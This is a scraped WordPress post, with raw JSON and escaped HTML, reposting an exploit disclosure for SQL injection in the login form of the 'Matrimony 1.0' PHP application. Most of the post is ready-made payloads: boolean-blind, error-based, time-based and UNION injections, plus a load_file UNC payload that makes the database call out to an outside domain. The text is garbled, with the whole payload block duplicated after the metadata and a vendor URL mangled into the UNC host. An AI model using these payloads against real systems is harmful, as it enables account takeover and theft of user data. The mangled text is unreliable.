## Title: Matrimony 1.0 SQLi\n## Author: nu11secur1ty\n## Date: 03.05.2022\n## Vendor: https:\/\/www.vetbossel.in\/matrimony-project-php\/\n## Software: https:\/\/cutt.ly\/LOHzKd0,<\/p>\n
Matrimony Project PHP<\/a><\/p><\/blockquote>\n<\/iframe><br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe password parameter appears to be vulnerable to SQL injection attacks.<br \/>\nThe payload ‘+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’<br \/>\nwas submitted in the password parameter.<br \/>\nThis payload injects a SQL sub-query that calls MySQL’s load_file<br \/>\nfunction with a UNC file path that references a URL on an external<br \/>\ndomain.<br \/>\nThe application interacted with that domain, indicating that the<br \/>\ninjected SQL query was executed.<br \/>\nThe attacker can take administrator account control and also of all<br \/>\naccounts on this system,<br \/>\nalso the malicious user can download all information about this system.<\/p>\n<p dir=\"ltr\">Status: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">“`mysql<\/p>\n<p dir=\"ltr\">—<br \/>\nParameter: username (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind – WHERE or HAVING clause<br \/>\nPayload: username=-5824′ OR 4197=4197–<br \/>\njrsh&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: username=VbMOEEMf’ AND (SELECT 2589 FROM(SELECT<br \/>\nCOUNT(*),CONCAT(0x7178706b71,(SELECT<br \/>\n(ELT(2589=2589,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–<br \/>\ngXFR&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: username=VbMOEEMf’ AND (SELECT 4030 FROM<br \/>\n(SELECT(SLEEP(5)))ciQI)– nHot&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: UNION query<br \/>\nTitle: Generic UNION query (NULL) – 1 column<br \/>\nPayload: username=-4629′ UNION ALL SELECT<br \/>\nCONCAT(0x7178706b71,0x505747504a524d546e7842785156787361686c546c6e695873646952794a545770586447467a4d6b,0x71706a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL–<br \/>\n-&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<br \/>\n—<\/p>\n<p dir=\"ltr\">“`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/7gggih)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Matrimony 1.0 SQLi ## Author: nu11secur1ty ## Date: 03.05.2022 ## Vendor: https:\/\/www.vetbossel.in\/matrimony-project-php\/ ## Software: https:\/\/cutt.ly\/LOHzKd0, Matrimony Project PHP ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload ‘+(select load_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’ was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL’s …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21398","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21398"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21398\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<\/iframe><br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe password parameter appears to be vulnerable to SQL injection attacks.<br \/>\nThe payload ‘+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’<br \/>\nwas submitted in the password parameter.<br \/>\nThis payload injects a SQL sub-query that calls MySQL’s load_file<br \/>\nfunction with a UNC file path that references a URL on an external<br \/>\ndomain.<br \/>\nThe application interacted with that domain, indicating that the<br \/>\ninjected SQL query was executed.<br \/>\nThe attacker can take administrator account control and also of all<br \/>\naccounts on this system,<br \/>\nalso the malicious user can download all information about this system.<\/p>\n<p dir=\"ltr\">Status: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">“`mysql<\/p>\n<p dir=\"ltr\">—<br \/>\nParameter: username (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind – WHERE or HAVING clause<br \/>\nPayload: username=-5824′ OR 4197=4197–<br \/>\njrsh&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: username=VbMOEEMf’ AND (SELECT 2589 FROM(SELECT<br \/>\nCOUNT(*),CONCAT(0x7178706b71,(SELECT<br \/>\n(ELT(2589=2589,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–<br \/>\ngXFR&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: username=VbMOEEMf’ AND (SELECT 4030 FROM<br \/>\n(SELECT(SLEEP(5)))ciQI)– nHot&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<\/p>\n<p dir=\"ltr\">Type: UNION query<br \/>\nTitle: Generic UNION query (NULL) – 1 column<br \/>\nPayload: username=-4629′ UNION ALL SELECT<br \/>\nCONCAT(0x7178706b71,0x505747504a524d546e7842785156787361686c546c6e695873646952794a545770586447467a4d6b,0x71706a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL–<br \/>\n-&password=i0C!o0b!U4’+(select<br \/>\nload_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’&op=Log<br \/>\nin<br \/>\n—<\/p>\n<p dir=\"ltr\">“`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/7gggih)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Matrimony 1.0 SQLi ## Author: nu11secur1ty ## Date: 03.05.2022 ## Vendor: https:\/\/www.vetbossel.in\/matrimony-project-php\/ ## Software: https:\/\/cutt.ly\/LOHzKd0, Matrimony Project PHP ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/vetbossel.in\/2022\/Matrimony ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload ‘+(select load_file(‘\\\\\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https:\/\/www.vetbossel.in\/matrimony-project-php\/\\\\qou’))+’ was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL’s …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21398","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21398"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21398\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}